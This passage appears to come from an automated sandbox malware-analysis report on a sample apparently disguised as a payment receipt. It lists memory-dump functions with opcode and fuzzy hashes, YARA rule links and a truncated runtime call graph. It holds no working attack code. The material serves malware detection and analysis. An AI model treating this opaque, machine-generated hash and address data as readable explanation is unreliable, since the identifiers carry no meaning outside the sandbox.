                                                    • Opcode Fuzzy Hash: aa8a53e571e84c5aa6d8dd0f1207ca1e7838a7ad829a7781c381ec65b295f18e
                                                    • Instruction Fuzzy Hash: 3F1280F4C01746ABE710CF65E84C1897AB1FBA5328B90820DDE616B2E5DBBC194BCF45
                                                    Function 06F475E8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff564db9cb4f33fb05969f9350d7ea43f5cb61ef07c59a80cfaec0e82ecf14f4
                                                    • Instruction ID: e77ef569ca24f4168ab7ba97e5286b9a18aead3ff4855b6cf6990ef7caccbd0f
                                                    • Opcode Fuzzy Hash: ff564db9cb4f33fb05969f9350d7ea43f5cb61ef07c59a80cfaec0e82ecf14f4
                                                    • Instruction Fuzzy Hash: 03E12B74E001598FDB54EFA8C5809AEFBF2FF89305F248169E414AB35AD730A941CFA1
                                                    Function 06F492C0 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5fc4e056c51d60e7b851bac93df0690127c9bfcfd390064d767c35ed829cde2
                                                    • Instruction ID: bcaf461fa8e5e7851da86f5335ec1a510680d43c551d424ac304b2269f2a0629
                                                    • Opcode Fuzzy Hash: b5fc4e056c51d60e7b851bac93df0690127c9bfcfd390064d767c35ed829cde2
                                                    • Instruction Fuzzy Hash: 5BE11774E001198FDB54DFA9C5809AEFBF2BF89305F24C169E418AB35AD770A941CFA1
                                                    Function 06F4A078 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30306a3f8150bb432eec68148cfa5017b9e771910bb6e68322acb3cc9a8f32ce
                                                    • Instruction ID: 67aaa49fe7da845878d693bfe4cc947f6680b5642aeaa375168c1a314740aef5
                                                    • Opcode Fuzzy Hash: 30306a3f8150bb432eec68148cfa5017b9e771910bb6e68322acb3cc9a8f32ce
                                                    • Instruction Fuzzy Hash: C3E13B74E001198FDB54DFA9C5809AEFBF2FF89305F248169E414AB35ADB31AA41CF61
                                                    Function 06F47E58 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 390e9e1b03852fafdfff2a8806d0669780e40fb8aa8e8f8c9df1f66550c8484c
                                                    • Instruction ID: f6a289aaaefd84ed8a295b075e1497c62acb3bbf1977c6905b64e06d319418e0
                                                    • Opcode Fuzzy Hash: 390e9e1b03852fafdfff2a8806d0669780e40fb8aa8e8f8c9df1f66550c8484c
                                                    • Instruction Fuzzy Hash: A0E11B74E001198FDB54DFA9C5809AEFBF2FF89305F248169E414AB35AD730AA45CFA1
                                                    Function 06F47A20 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 85fb18a9e0fbe5a6cec1a8459d0b416680f7edf19e16cd1ebec4574744be43e8
                                                    • Instruction ID: 467654239d26feafed31c3c05a1b23bae4b668cacad038a35589ba804c8175dc
                                                    • Opcode Fuzzy Hash: 85fb18a9e0fbe5a6cec1a8459d0b416680f7edf19e16cd1ebec4574744be43e8
                                                    • Instruction Fuzzy Hash: 90E11A74E001198FDB54EFA9C5809AEFBF2FF89305F248169E414AB75AD730A941CFA1
                                                    Function 05A57448 Relevance: .3, Instructions: 270COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61defc7af3dfcdbe4801126738855327b8c7cd6ebb279250d928f28ce15c5c02
                                                    • Instruction ID: f2b5a58356f099a1d4edae4cc5fcb9357de3d9d2deab390ce2ee1314b7ffb0ed
                                                    • Opcode Fuzzy Hash: 61defc7af3dfcdbe4801126738855327b8c7cd6ebb279250d928f28ce15c5c02
                                                    • Instruction Fuzzy Hash: 42D1F431D2071A9ACB11EF64D990A9DB7B1FF95300F10D79AE10937215EBB0AAC9CF81
                                                    Function 05A57458 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 959c83ab6b8d7a960ecdf521ccce92ac3220d92692c0a40e24a00f9330f20e9e
                                                    • Instruction ID: c36fdff8d5a154e9ae54b6eee56bef879949a73727378929d208d7c1cc0471e3
                                                    • Opcode Fuzzy Hash: 959c83ab6b8d7a960ecdf521ccce92ac3220d92692c0a40e24a00f9330f20e9e
                                                    • Instruction Fuzzy Hash: 52D1E431D2075A9ACB11EF64D990A9DB7B1FF95300F10D79AE10937215EBB06AC9CF81
                                                    Function 023EE104 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2066239248.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_23e0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7924a2d26a49c3bbca6513f09e80cda22fb2f3fcc9e77830313433187adfa6c8
                                                    • Instruction ID: e7ee892f51eb11c3c1314e21685cec76f9387dc15497f086c94e6faf17592df1
                                                    • Opcode Fuzzy Hash: 7924a2d26a49c3bbca6513f09e80cda22fb2f3fcc9e77830313433187adfa6c8
                                                    • Instruction Fuzzy Hash: 69A18032E00229CFCF19DFB4C84459EB7B2FF85314B15456AE806AB2A5DB75E94ACF40
                                                    Function 05810120 Relevance: .2, Instructions: 227COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072322485.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5810000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4c978f7db182c6032c367717ec762b60b16b0bbf92e67ab61fd37daa18ca95d
                                                    • Instruction ID: 15a1e34681d1fdc6ab802d4c1c1c027877fd0602717f8250a2771343254dd14a
                                                    • Opcode Fuzzy Hash: d4c978f7db182c6032c367717ec762b60b16b0bbf92e67ab61fd37daa18ca95d
                                                    • Instruction Fuzzy Hash: 88C1F4F0C00746ABD715CF69E8481897BB1FBA5328B50860DDD616B2E5DBBC184BCF44
                                                    Function 06EF99F9 Relevance: .2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0244cd49f59456c70017990d4fcfc40fca01aac8a16c396ef52f9ebdad1c1917
                                                    • Instruction ID: b9c602605f7ed8cbe19c6b3b912055518afaa40dde9261c7279f18b48bd92aae
                                                    • Opcode Fuzzy Hash: 0244cd49f59456c70017990d4fcfc40fca01aac8a16c396ef52f9ebdad1c1917
                                                    • Instruction Fuzzy Hash: 83810374E25209CFCB44CFA9C58499EFBF1FF88310F14A566D559AB221D334AA41CF91
                                                    Function 06EF9A08 Relevance: .2, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a7ffaedbea68617b0da08378adc64df34dc70ec4738d239d54d2687a5cd033ea
                                                    • Instruction ID: 27a7e0b4709b492c27251926249ea97ba89054f8a1c7b22c3e293f3d83870d34
                                                    • Opcode Fuzzy Hash: a7ffaedbea68617b0da08378adc64df34dc70ec4738d239d54d2687a5cd033ea
                                                    • Instruction Fuzzy Hash: 8C91E070E25219CFCB44CF99C58499EBBF2FB88310F24A559D559BB221D334AA41CF91
                                                    Function 06EFEB90 Relevance: .2, Instructions: 193COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6d34551a900fb542d8900b7a57850ea318150639a4454468d7dd07d6e4e5bba
                                                    • Instruction ID: c0277c7804d4a58f0fa07fd1e31c9ca081a622e5c6a7c004d9764f1ffc6879e5
                                                    • Opcode Fuzzy Hash: c6d34551a900fb542d8900b7a57850ea318150639a4454468d7dd07d6e4e5bba
                                                    • Instruction Fuzzy Hash: F8815B70E102199FDB54DFA9C5809AEFBB3BF89301F24D1A9D408A7356D730AA41CFA1
                                                    Function 06EFAE08 Relevance: .2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 878ad7f34c0d1745789c88207f8869eb2853675490247c3b98cbd202e129cd61
                                                    • Instruction ID: 84ed82421f533e4ce7ef84e2a5ed09cd1b01fecc006a366eaf63fa5a96f64257
                                                    • Opcode Fuzzy Hash: 878ad7f34c0d1745789c88207f8869eb2853675490247c3b98cbd202e129cd61
                                                    • Instruction Fuzzy Hash: 07710A74E15609CFDB44CFA9C5805EEFBF2FF88350F24A42AD51ABB264D3349A418B64
                                                    Function 06EFAE18 Relevance: .2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 117e0c09f3be9e99f3f8ffa0bed4ef945b8aaf7ba9851db4b08b5446e9f34aa2
                                                    • Instruction ID: 23e21b397457e2b1eecc926fb6fd866e269ada7cd68819ce7a17c004b69f01ec
                                                    • Opcode Fuzzy Hash: 117e0c09f3be9e99f3f8ffa0bed4ef945b8aaf7ba9851db4b08b5446e9f34aa2
                                                    • Instruction Fuzzy Hash: DE71F874E15609CFDB54CFA9C5805EEFBF2FF88350F24A42AD51ABB224D3349A418B64
                                                    Function 06F47A11 Relevance: .1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073451561.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6f40000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945b397b2724505fe3ce781778d311fe6a8cd9cdf5ddd8fbbeabc734877d9161
                                                    • Instruction ID: 4977aa8054964f098b1d97eaabc3211894e1cdc65137f1223a472876e400ddb8
                                                    • Opcode Fuzzy Hash: 945b397b2724505fe3ce781778d311fe6a8cd9cdf5ddd8fbbeabc734877d9161
                                                    • Instruction Fuzzy Hash: 18512970E002198FDB54DFA9C5805AEFBF2BF89304F24C169D458AB71AD7309A42CFA1
                                                    Function 06EFB099 Relevance: .1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a1b8bba4ab1403b764cac705a19e1fab0373cb56d245c73f7ace1ef54e7a5f75
                                                    • Instruction ID: 2600127ca0cc8c2406aaea2a64d26ff3f4ff69258b2deb7139a1ebd121341032
                                                    • Opcode Fuzzy Hash: a1b8bba4ab1403b764cac705a19e1fab0373cb56d245c73f7ace1ef54e7a5f75
                                                    • Instruction Fuzzy Hash: 174127B0E1520ADFDB44CFAAC5815EEFBF2EF88300F24D56AC515A7254E7709A41CBA4
                                                    Function 06EFE098 Relevance: .1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ba3163f3dfd8ab8a8e965a8f855ddf5e5f43f70a66206824e714f78b199c581
                                                    • Instruction ID: 2e6900bacbb2caaad8b1f9522fe8f9097cd56bf5c90e595abfc2e5c6f57461cb
                                                    • Opcode Fuzzy Hash: 6ba3163f3dfd8ab8a8e965a8f855ddf5e5f43f70a66206824e714f78b199c581
                                                    • Instruction Fuzzy Hash: AB415D70E1670ADFDB44CFA6C5415AEFBB2AF89300F24D4AAC104A7264E7749A41CB91
                                                    Function 06EFB0A8 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e923c8d5541348eeb3bed85377d284fa95e5e31da67ce0da0f5443a442329fe3
                                                    • Instruction ID: 2deca2e395b4539a70196f1f38c5720e4fb1815768aa6f2c80d5fabfc1a54c99
                                                    • Opcode Fuzzy Hash: e923c8d5541348eeb3bed85377d284fa95e5e31da67ce0da0f5443a442329fe3
                                                    • Instruction Fuzzy Hash: 5041E5B0E1560ADFDB44CFAAC5815EEFBF2EF88300F24D56AC515B7214E7309A418BA4
                                                    Function 06EFE0A8 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4dbddc661f9b79c03536bfa243ea05b26d9f8e149cc273d222c5a3470b41bdfe
                                                    • Instruction ID: cdc090bde2acbbaaf13dd26cf3236a970d32f3444a8c7f2a85e6326ae7889e73
                                                    • Opcode Fuzzy Hash: 4dbddc661f9b79c03536bfa243ea05b26d9f8e149cc273d222c5a3470b41bdfe
                                                    • Instruction Fuzzy Hash: F2412970E1570AEFDB44CFAAD5416AEFBF2AF88300F20E46AC105B7264E77497418B94
                                                    Function 06EFAC01 Relevance: .1, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2f0ee290b32ec0b24b9705fb81b44023e10a707bda12ffd8eab955676247a70
                                                    • Instruction ID: 96cc4ca57d4096f796ec33d26f3ba998c08f57ac7d91a9486ae169967843894c
                                                    • Opcode Fuzzy Hash: b2f0ee290b32ec0b24b9705fb81b44023e10a707bda12ffd8eab955676247a70
                                                    • Instruction Fuzzy Hash: E14114B0E1560ADFDB48CFAAD4805AEFBF2AF89300F14D46AC519BB254D3359A41CF94
                                                    Function 06EFAC10 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 28092060a2453a06bbe285267831e1b35ba5fa8d97d31e86bd02875303224ff5
                                                    • Instruction ID: 759ad65106945998632cceecdd16a880e7359d8a2140de32ba2e73d8c78631cc
                                                    • Opcode Fuzzy Hash: 28092060a2453a06bbe285267831e1b35ba5fa8d97d31e86bd02875303224ff5
                                                    • Instruction Fuzzy Hash: E241C0B4E1560ADFDB48CFAAC4805EEFBF2AB88300F14D46AC519AB214D7359A41CF94
                                                    Function 06EF5A60 Relevance: .1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d15c88b006da3daa74622153127dca415a5f14f03f3979cbd022f769c4b9d9be
                                                    • Instruction ID: 1bad56db0fa1bfe1df10050c2bb710d08cbdbf53c184ca50466e643829617f21
                                                    • Opcode Fuzzy Hash: d15c88b006da3daa74622153127dca415a5f14f03f3979cbd022f769c4b9d9be
                                                    • Instruction Fuzzy Hash: 3521FC71E157189BEB58CF6B980069EFBF3AFC9210F04C0BAD518B6255EB3005568F61
                                                    Function 05A50651 Relevance: 7.6, Strings: 6, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                    • API String ID: 0-471056614
                                                    • Opcode ID: e9a8526d2048c336326ec8710bceda604db6b77ef339c9523da6d553116d2e09
                                                    • Instruction ID: 998041d0212a3da10685d3f2d9375ee6e118baadb68c1762a27ae0710c4ddaf4
                                                    • Opcode Fuzzy Hash: e9a8526d2048c336326ec8710bceda604db6b77ef339c9523da6d553116d2e09
                                                    • Instruction Fuzzy Hash: 75411030E012069FC708EF74E491A5E7BB6FF54304B50856DD415AB2A9EF386D06CF92
                                                    Function 05A50660 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                                    • API String ID: 0-471056614
                                                    • Opcode ID: 245f044c31ac04cf2685a1988170849e09d86f24dac99ae721871a9e91f5cf0c
                                                    • Instruction ID: 99ff006f0e83faaf56ba829c8683dd1a1318755852e7f32670213d89d6574378
                                                    • Opcode Fuzzy Hash: 245f044c31ac04cf2685a1988170849e09d86f24dac99ae721871a9e91f5cf0c
                                                    • Instruction Fuzzy Hash: 88411230E011069FCB08EF74F45195E7BB6FF54300B50956DD415AB2A9EF386D06CB92

                                                    Execution Graph

                                                    Execution Coverage:2.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:2.6%
                                                    Total number of Nodes:1668
                                                    Total number of Limit Nodes:5
                                                    execution_graph 6510 10008640 6513 10008657 6510->6513 6514 10008665 6513->6514 6515 10008679 6513->6515 6518 10006368 _free 20 API calls 6514->6518 6516 10008681 6515->6516 6517 10008693 6515->6517 6520 10006368 _free 20 API calls 6516->6520 6524 10008652 6517->6524 6526 100054a7 6517->6526 6519 1000866a 6518->6519 6521 100062ac ___std_exception_copy 26 API calls 6519->6521 6522 10008686 6520->6522 6521->6524 6525 100062ac ___std_exception_copy 26 API calls 6522->6525 6525->6524 6527 100054ba 6526->6527 6528 100054c4 6526->6528 6527->6524 6528->6527 6529 10005af6 _abort 38 API calls 6528->6529 6530 100054e5 6529->6530 6534 10007a00 6530->6534 6535 10007a13 6534->6535 6536 100054fe 6534->6536 6535->6536 6542 10007f0f 6535->6542 6538 10007a2d 6536->6538 6539 10007a40 6538->6539 6540 10007a55 6538->6540 6539->6540 6677 10006d7e 6539->6677 6540->6527 6543 10007f1b ___DestructExceptionObject 6542->6543 6544 10005af6 _abort 38 API calls 6543->6544 6545 10007f24 6544->6545 6546 10007f72 _abort 6545->6546 6554 10005671 RtlEnterCriticalSection 6545->6554 6546->6536 6548 10007f42 6555 10007f86 6548->6555 6553 100055a8 _abort 38 API calls 6553->6546 6554->6548 6556 10007f56 6555->6556 6557 10007f94 __fassign 6555->6557 6559 10007f75 6556->6559 6557->6556 6562 10007cc2 6557->6562 6676 100056b9 RtlLeaveCriticalSection 6559->6676 6561 10007f69 6561->6546 6561->6553 6563 10007d42 6562->6563 6566 10007cd8 6562->6566 6564 10007d90 6563->6564 6567 1000571e _free 20 API calls 6563->6567 6630 10007e35 6564->6630 6566->6563 6568 10007d0b 6566->6568 6573 1000571e _free 20 API calls 6566->6573 6569 10007d64 6567->6569 6570 10007d2d 6568->6570 6575 1000571e _free 20 API calls 6568->6575 6571 1000571e _free 20 API calls 6569->6571 6572 1000571e _free 20 API calls 6570->6572 6574 10007d77 6571->6574 6577 10007d37 6572->6577 6579 10007d00 6573->6579 6576 1000571e _free 20 API calls 6574->6576 6581 10007d22 6575->6581 6582 10007d85 6576->6582 6583 1000571e _free 20 API calls 6577->6583 6578 10007dfe 6584 1000571e _free 20 API calls 6578->6584 6590 100090ba 6579->6590 6580 10007d9e 6580->6578 6588 1000571e 20 API calls _free 6580->6588 6618 100091b8 6581->6618 6587 1000571e _free 20 API calls 6582->6587 6583->6563 6589 10007e04 6584->6589 6587->6564 6588->6580 6589->6556 6591 100090cb 6590->6591 6617 100091b4 6590->6617 6592 100090dc 6591->6592 6593 1000571e _free 20 API calls 6591->6593 6594 100090ee 6592->6594 6596 1000571e _free 20 API calls 6592->6596 6593->6592 6595 10009100 6594->6595 6597 1000571e _free 20 API calls 6594->6597 6598 10009112 6595->6598 6599 1000571e _free 20 API calls 6595->6599 6596->6594 6597->6595 6600 10009124 6598->6600 6601 1000571e _free 20 API calls 6598->6601 6599->6598 6602 10009136 6600->6602 6604 1000571e _free 20 API calls 6600->6604 6601->6600 6603 10009148 6602->6603 6605 1000571e _free 20 API calls 6602->6605 6606 1000915a 6603->6606 6607 1000571e _free 20 API calls 6603->6607 6604->6602 6605->6603 6608 1000571e _free 20 API calls 6606->6608 6611 1000916c 6606->6611 6607->6606 6608->6611 6609 10009190 6614 100091a2 6609->6614 6615 1000571e _free 20 API calls 6609->6615 6610 1000917e 6610->6609 6613 1000571e _free 20 API calls 6610->6613 6611->6610 6612 1000571e _free 20 API calls 6611->6612 6612->6610 6613->6609 6616 1000571e _free 20 API calls 6614->6616 6614->6617 6615->6614 6616->6617 6617->6568 6619 100091c5 6618->6619 6629 1000921d 6618->6629 6620 1000571e _free 20 API calls 6619->6620 6621 100091d5 6619->6621 6620->6621 6622 100091e7 6621->6622 6623 1000571e _free 20 API calls 6621->6623 6624 100091f9 6622->6624 6626 1000571e _free 20 API calls 6622->6626 6623->6622 6625 1000920b 6624->6625 6627 1000571e _free 20 API calls 6624->6627 6628 1000571e _free 20 API calls 6625->6628 6625->6629 6626->6624 6627->6625 6628->6629 6629->6570 6631 10007e60 6630->6631 6632 10007e42 6630->6632 6631->6580 6632->6631 6636 1000925d 6632->6636 6635 1000571e _free 20 API calls 6635->6631 6637 10007e5a 6636->6637 6638 1000926e 6636->6638 6637->6635 6672 10009221 6638->6672 6641 10009221 __fassign 20 API calls 6642 10009281 6641->6642 6643 10009221 __fassign 20 API calls 6642->6643 6644 1000928c 6643->6644 6645 10009221 __fassign 20 API calls 6644->6645 6646 10009297 6645->6646 6647 10009221 __fassign 20 API calls 6646->6647 6648 100092a5 6647->6648 6649 1000571e _free 20 API calls 6648->6649 6650 100092b0 6649->6650 6651 1000571e _free 20 API calls 6650->6651 6652 100092bb 6651->6652 6653 1000571e _free 20 API calls 6652->6653 6654 100092c6 6653->6654 6655 10009221 __fassign 20 API calls 6654->6655 6656 100092d4 6655->6656 6657 10009221 __fassign 20 API calls 6656->6657 6658 100092e2 6657->6658 6659 10009221 __fassign 20 API calls 6658->6659 6660 100092f3 6659->6660 6661 10009221 __fassign 20 API calls 6660->6661 6662 10009301 6661->6662 6663 10009221 __fassign 20 API calls 6662->6663 6664 1000930f 6663->6664 6665 1000571e _free 20 API calls 6664->6665 6666 1000931a 6665->6666 6667 1000571e _free 20 API calls 6666->6667 6668 10009325 6667->6668 6669 1000571e _free 20 API calls 6668->6669 6670 10009330 6669->6670 6671 1000571e _free 20 API calls 6670->6671 6671->6637 6673 10009258 6672->6673 6674 10009248 6672->6674 6673->6641 6674->6673 6675 1000571e _free 20 API calls 6674->6675 6675->6674 6676->6561 6678 10006d8a ___DestructExceptionObject 6677->6678 6679 10005af6 _abort 38 API calls 6678->6679 6681 10006d94 6679->6681 6682 10006e18 _abort 6681->6682 6683 100055a8 _abort 38 API calls 6681->6683 6685 1000571e _free 20 API calls 6681->6685 6686 10005671 RtlEnterCriticalSection 6681->6686 6687 10006e0f 6681->6687 6682->6540 6683->6681 6685->6681 6686->6681 6690 100056b9 RtlLeaveCriticalSection 6687->6690 6689 10006e16 6689->6681 6690->6689 7257 10007a80 7258 10007a8d 7257->7258 7259 